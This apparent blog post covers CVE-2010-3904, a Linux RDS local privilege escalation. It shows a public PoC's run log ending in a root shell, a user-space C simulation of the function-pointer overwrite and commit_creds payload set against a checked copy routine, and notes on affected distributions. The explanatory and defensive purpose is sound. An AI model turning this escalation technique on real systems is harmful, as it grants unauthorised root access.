Privilege escalation in the Linux kernel
The H Security reports the second local privilege escalation in Linux this week (the first was a bug in the ld.so dynamic linker), this one tracked as CVE-2010-3904.
They link to the advisory as well as the PoC.
On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.
I tested it on an old Ubuntu 10.10 RC VMware image and it worked.
Ubuntu’s advisory was published on October 19th.
msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09d6a40
[+] Resolved rds_ioctl to 0xe09d0000
[+] Resolved commit_creds to 0xc016c340
[+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
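To make the mechanism described in the advisory and visible in the PoC output concrete, here is an added example (my own user-space model, not the original post's code and not Dan Rosenberg's exploit or the kernel's RDS code). It models a kernel copy routine that omits the access_ok() check on a user-supplied destination, uses that to overwrite a proto_ops function pointer with a payload that does the usual commit_creds(prepare_kernel_cred(0)), triggers it through the pointer and restores the pointer afterwards, and then shows the same attempt failing against a copy routine that does check the destination. The "user/kernel split", the proto_ops structure, the credential handling and every function name prefixed sim_ are assumptions of the simulation, not the real kernel API.

```c
/*
 * Added example, not from the original post or from the CVE-2010-3904 PoC.
 * User-space model of the bug class: a kernel-style copy routine that does
 * not verify that its user-supplied destination lies in the user range lets
 * a local caller write arbitrary values into "kernel" memory. The write is
 * aimed at a proto_ops function pointer; calling through that pointer then
 * runs the attacker's payload, which swaps in root credentials.
 * Everything here (address split, structures, credential handling) is a
 * simulation; the sim_* helpers are stand-ins, not kernel functions.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated task credentials, standing in for struct cred. */
struct sim_cred { unsigned uid; unsigned gid; };
static struct sim_cred current_cred = { 1000, 1000 };

/* Simulated kernel object: a protocol ops table with one function pointer. */
struct sim_proto_ops { int (*ioctl)(void); };
static int rds_ioctl(void) { return -ENOTTY; }            /* benign original */
static struct sim_proto_ops rds_proto_ops = { rds_ioctl };

/* Simulated address-space split: in this model "user" memory is one page;
 * every other address counts as kernel memory (assumption of the model). */
static unsigned char user_page[4096];

static int sim_access_ok(const void *p, size_t n)
{
    uintptr_t a = (uintptr_t)p;
    uintptr_t lo = (uintptr_t)user_page, hi = lo + sizeof user_page;
    return a >= lo && n <= hi - a;
}

/* Vulnerable copy: trusts the destination pointer (the missing check). */
static int copy_to_user_unchecked(void *dst, const void *src, size_t n)
{
    memcpy(dst, src, n);
    return 0;
}

/* Hardened copy: refuses any destination outside the user range. */
static int copy_to_user_checked(void *dst, const void *src, size_t n)
{
    if (!sim_access_ok(dst, n))
        return -EFAULT;
    memcpy(dst, src, n);
    return 0;
}

/* Attacker payload: the classic commit_creds(prepare_kernel_cred(0)). */
static struct sim_cred sim_prepare_kernel_cred(void)
{
    struct sim_cred root = { 0, 0 };
    return root;
}
static void sim_commit_creds(struct sim_cred c) { current_cred = c; }
static int payload(void)
{
    sim_commit_creds(sim_prepare_kernel_cred());
    return 0;
}

/* A "socket call" that copies protocol data to a user-chosen destination
 * with whichever copy routine the kernel build happens to use. */
static int sim_rds_recv(int (*copy)(void *, const void *, size_t),
                        void *user_dst, const void *data, size_t n)
{
    return copy(user_dst, data, n);
}

/* Run the attack against one copy routine; returns the resulting uid. */
static unsigned run_attack(int (*copy)(void *, const void *, size_t))
{
    int (*evil)(void) = payload;
    int rc;

    current_cred.uid = 1000; current_cred.gid = 1000;   /* unprivileged */
    rds_proto_ops.ioctl = rds_ioctl;

    /* Aim the "user" destination at the kernel function-pointer slot. */
    rc = sim_rds_recv(copy, &rds_proto_ops.ioctl, &evil, sizeof evil);
    if (rc == 0)
        rds_proto_ops.ioctl();          /* trigger the (overwritten) pointer */
    rds_proto_ops.ioctl = rds_ioctl;    /* restore, as the PoC does */
    return current_cred.uid;
}

int main(void)
{
    printf("unchecked copy: uid=%u\n", run_attack(copy_to_user_unchecked));
    printf("checked copy:   uid=%u\n", run_attack(copy_to_user_checked));
    return 0;
}
```

The point of the two runs is that nothing about the payload or the trigger changes between them: the whole difference between "Got root!" and a failed syscall is whether the copy routine validates its user-supplied destination against the user segment before writing.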
I checked the advisory published by Red Hat and it seems that RHEL is not affected (RHEL 3 and 4 for sure), or I did not manage to make it work.
Debian seems to have a vulnerable kernel only in testing (squeeze) and unstable (sid). The advisory marks all versions as vulnerable, but that seems wrong, since the stable and backports kernels do not support RDS.